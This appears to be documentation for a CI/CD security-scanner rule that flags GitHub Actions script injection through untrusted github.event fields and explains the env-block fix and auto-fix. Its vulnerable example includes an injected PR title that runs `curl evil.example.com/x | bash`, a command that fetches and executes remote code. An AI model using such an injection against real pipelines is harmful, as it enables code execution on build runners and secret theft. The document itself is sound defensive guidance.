| Field | Value |
|---|---|
| Category | CICD-SEC-4 |
| Severity | HIGH |
| OWASP | CICD-SEC-4: Poisoned Pipeline Execution (PPE) |
| Auto-fix | ✓ (see "Auto-fix" below) |

What the check does

Flags any step whose inline run: script contains a ${{ github.event.* }} interpolation from a user-controlled context:
  • github.event.pull_request.*
  • github.event.issue.*
  • github.event.comment.*
  • github.event.head_commit.*
  • github.event.commits.*
GitHub Actions substitutes these expressions into the shell command string before execution, so an attacker who can shape the value (a PR title, issue body, commit message) can inject arbitrary shell.

Vulnerable example

```yaml
- name: Greet PR
  run: |
    echo "Welcome ${{ github.event.pull_request.title }}!"   # ← injection
```
A PR titled `"; curl evil.example.com/x | bash; #` becomes:
```sh
echo "Welcome "; curl evil.example.com/x | bash; #!"
```

Safe alternative

Lift the untrusted value into the step’s env: block first, then reference it as a normal shell variable:
```yaml
- name: Greet PR
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  run: |
    echo "Welcome $PR_TITLE!"
```
GitHub Actions evaluates the expression in `env:` and hands the result to the step as an environment variable; the shell then expands `$PR_TITLE` at runtime as plain data, never as command syntax (quote it, as here, so the value also stays a single word).

Auto-fix

--fix performs the lift automatically:
  1. For each matched ${{ github.event.* }} expression in the step’s run:,
  2. Create a corresponding entry in the step’s env: block (creates the block if missing), and
  3. Replace the interpolation in the script with $VAR_NAME.
Variable names are derived from the expression path (e.g. `github.event.pull_request.title` → `PR_PULL_REQUEST_TITLE`).